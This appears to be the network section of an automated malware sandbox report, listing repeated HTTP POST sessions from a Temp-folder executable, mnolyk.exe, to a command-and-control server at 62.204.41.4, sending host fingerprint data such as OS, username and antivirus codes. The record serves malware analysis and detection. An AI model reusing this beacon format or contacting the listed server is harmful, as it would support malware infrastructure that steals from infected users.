368	192.168.2.5	50079	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:49.105142117 CET	594	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:49.170850992 CET	594	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
369	192.168.2.5	50080	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:49.338342905 CET	595	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:49.402851105 CET	595	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.5	49737	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:14.935622931 CET	165	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:15.002446890 CET	165	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
370	192.168.2.5	50081	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:49.575685024 CET	596	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:49.639643908 CET	596	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
371	192.168.2.5	50082	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:49.824851036 CET	597	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:49.890588045 CET	597	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
372	192.168.2.5	50083	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:50.074970007 CET	598	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:50.139771938 CET	598	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
373	192.168.2.5	50084	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:50.307277918 CET	599	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:50.371098995 CET	599	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
374	192.168.2.5	50085	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:50.542001963 CET	600	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:50.605951071 CET	600	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
375	192.168.2.5	50086	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:50.782617092 CET	601	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:50.847079039 CET	601	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
376	192.168.2.5	50087	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:51.030172110 CET	602	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:51.096081018 CET	602	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
377	192.168.2.5	50088	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:51.281256914 CET	603	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:51.346573114 CET	603	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
378	192.168.2.5	50089	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:51.531271935 CET	604	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:51.598530054 CET	604	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
379	192.168.2.5	50090	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:51.779335976 CET	605	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:51.844306946 CET	605	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.5	49738	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:15.178369045 CET	166	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:15.243549109 CET	166	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
380	192.168.2.5	50091	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:52.034089088 CET	606	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:52.100209951 CET	606	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
381	192.168.2.5	50092	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:52.278297901 CET	607	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:52.341474056 CET	607	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
382	192.168.2.5	50093	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:52.513267994 CET	608	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:52.577141047 CET	608	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
383	192.168.2.5	50094	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:52.753336906 CET	609	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:52.817672014 CET	609	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
384	192.168.2.5	50095	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:53.020937920 CET	610	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:53.087100029 CET	610	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
385	192.168.2.5	50096	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:53.262317896 CET	611	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:53.327903986 CET	611	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
386	192.168.2.5	50097	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:53.510976076 CET	612	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:53.576929092 CET	612	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
387	192.168.2.5	50098	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:53.748512983 CET	613	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
